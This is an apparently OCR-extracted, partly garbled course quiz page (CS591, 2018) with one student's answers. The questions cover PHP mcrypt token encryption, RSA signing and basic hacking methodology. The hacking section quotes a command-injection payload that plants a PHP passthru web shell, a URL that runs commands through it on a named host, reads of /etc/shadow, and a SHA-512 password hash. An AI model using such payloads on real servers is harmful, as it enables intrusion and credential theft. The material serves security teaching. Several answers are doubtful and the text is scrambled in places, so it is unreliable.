CS591 F2018 Quiz 2 Web Page

Enter your answers on the web page and after completing your answers, save a copy of you web page with answers for your own record (as a pdf file to save some tree) and push the submit button. You have until 11/20/2018 11:59pm to finish the midterm. Treat the yes/no questions as multiple-choice questions. You must choose either yes or no for each answer.

Save a copy of your answers before hitting the submit button. Make sure you see the "login OK" on the response web page. If you enter your password wrong, it will not save your quiz1 submission and display "login ok" message. If you have problem accessing the web server for submitting the answer, email me your pdf file with answers. Enter the following information. The password is used to verify the person submitting the

Your name:	Alta Graham
Your UFP account name:	agraham
Your password (All nine digits of your Student ID without dash, no prefix #a):	

1. Create Secure App with PHP Crypto API

a. Encryption and decryption. with php/regk.php we create a token value by using the \$email.'cyber' as plaintet and encrypt it with AES 256 bit key with mnemonic string "mobileWebProgramming" 92 \$plaintext=\$email.'cyber'; 93 \$key=hash('sha256', 'mobileWebProgramming', true); 94 \$iv size = mcrypt get iv size(MCRYPT RIJNDAEL 128, MCRYPT MODE CBC); 95 \$iv = mcrypt_create_iv(\$iv_size, MCRYPT_RAND); 96 \$ciphertext = mcrypt_encrypt(MCRYPT_RIJNDAEL_128, \$key, \$plaintext, MCRYPT_MODE_CBC, \$iv); 98 # prepend the IV for it to be available for decryption 99 \$ivciphertext = \$iv . \$ciphertext; 100 \$ivciphertext base64 = base64 encode(\$ivciphertext); 101 \$token=urlencode(\$ivciphertext_base64); An email with the link created using http://\$domain\php/confirmk.php?email=\$email&token=\$token are sent to the applicant. When they click on the link the \$email and \$token value is submitted to confirmk.php for processing. Here is the code for checking the token value is authentic. 24 \$ciphertext_dec = base64_decode(\$ciphertext_base64); 25 \$iv_size = mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC); 26 \$iv_dec = substr(\$ciphertext_dec, 0, \$iv_size); 27 \$key=hash('sha256', 'mobileWebProgramming', true); 28 \$ciphertext_dec = substr(\$ciphertext_dec, \$iv_size); 29 \$plaintext dec = mcrypt decrypt(MCRYPT RIJNDAEL 128, \$key, \$ciphertext dec, MCRYPT MODE CBC, \$iv dec); 30 31 \$keystring=\$email.'cyber'; 32 \$pl=strlen(\$plaintext_dec); 33 \$kl=strlen(\$keystring); 34 \$plaintext nopad=substr(\$plaintext dec, 0, \$kl); 35 \$pnl=strlen(\$plaintext_nopad); 36 if (strcmp(\$keystring, \$plaintext_nopad) == 0) { print "token matched!
"; 38 } else { 39 print "token does not match!. Registration is denied.< br />\n"; 40 1. Which basic service is implemented here by regk.php and confirmk.php? Integrity 2. If we change the key size to 128 bits, what will be the first parameter the hash function in Line 93? sha1 3. In lines 100-101 of regk.php, we first encode the data with base64, then perform urlencode. In Line24 of confirmk.php, we only see base64_decode is performed. Why confirmk.php does not perform urldecode first? php interpreter takes care of the urldecode 4. If we change line 92 of regk.php to \$plaintext=\$email."AS". when we enter hoh@uccs.edu as email address, what will be the size of \$ciphertext in terms of bytes? 32 b. Sign and Verify. 1. In viva /home/cs591/public_html/crypto/sign directory, it contains the signature.dat generated by the sign.php. The Is -al

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Because the second step of the signing process is RSA algorithm use a private key size of 256 bytes as input.

signature.dat shows the size of signature .dat file is 256 bytes. Why the signature.dat is 256 bytes?

openssl_sign(\$data, \$signature, \$pkeyid, OPENSSL_ALGO_SHA256);

	v many bytes of hash will be generated in the first step?
32	
What algorithm will be used to encyp	t the hash as signature?
RSA 💿	
2. Hacking and Patching	I has command injection vulnerability Dy adding "9 cohe //2nhn nearthry/\$ (CETIamdi); 2NN
/html/gsc/sh2b.php &"	Il has command injection vulnerability. By adding "& echo ' php passthru(\$_GET[cmd]); ? ' >
we were able to add sh2b.php to /var/ww	w/html/asc/ directory
Why apache web server allows such troja	
Because the gsc directory is owned by a	•
b. Since we know someone has deposit sh2	b.php in /var/www/html/gsc of cs3110.myuccs.net instance, what are exploit command you can
launch from a browser to verify your ansv	
http://cs3110.myuccs.net/gsc/sh2b.php?	cmd=ls%20-al
c. Which is true in the following statements?	
An python script without input validation	can be easily hacked than a php script with input validation.
	dology discussed in "Hacking exposed" by McClure et al.
a. The first step of hacking methodology is f	ootprinting.
o Yes No	-0
b. Which tool is popular for network scannin	-
1. nmap 2. wiredshark	Yes No
3. ping	Yes No
4. iptable	Yes No
c. Gaining Access.	165 110
Social Engineering is considered the easier was a considered to consider the easier was a considered the easier was a considered to consider the easier w	yav
to gain access to a system.	Yes No
2. Command injection can be prevented 100% r	oot Yes No
using any system code.	
3. SQL injection allow OS command to be inject	
0 0 0	use cs3110.myuccs.net or your own instance for verifying your answers of this problem.)
1. The hacker can use "cat /etc/shadov	ws key access web app (keyaccess.html and vul.py),
Yes No	to see the encrypted password.
2. The hacker can use "cat passwd" to	see a plain password file content
• Yes No	ood a plant passification and controllar
3. With "cat enpasswd", the hacker see	s the first line of encpasswd contain
csnet:\$6\$fyionly\$WXfqNItRpNIXXTF	RIOG5bC6CtEMsKpfykS1snMael5lFwAYisHHvhRKwMQyblLilZFBocqVQpuy8oHWXp.XuYw.
The 6 between the two '\$' is the pass	sword generation method.
Yes o No	
	acker can find the credential to access a database server.
Yes No	
e. Creating backdoors.	sh12.php saving it to the directory with ".1d" as a directory name.
Yes No	sitiz.prip saving it to the directory with . Id as a directory flame.
	cript file with the content such as 1.php.
Yes No	. г
Which basic security service help yo	u defend against replacement of your php scripts files?
a. Confidentiality	Yes No
b. Integrity	Yes No
c. Availability	Yes No
If you feel some of the questions are ambiguous st	ate the problem # and your assumptions on the answers.
	network scanning tool fping, and that ping as a system command was
too general to considered a "tool."	
In 3.c.2, I assumed	
In 3.d.3: the \$6\$ indicates hashing with SHA512 -	assumed "password generation" did not mean hashing.
submit	

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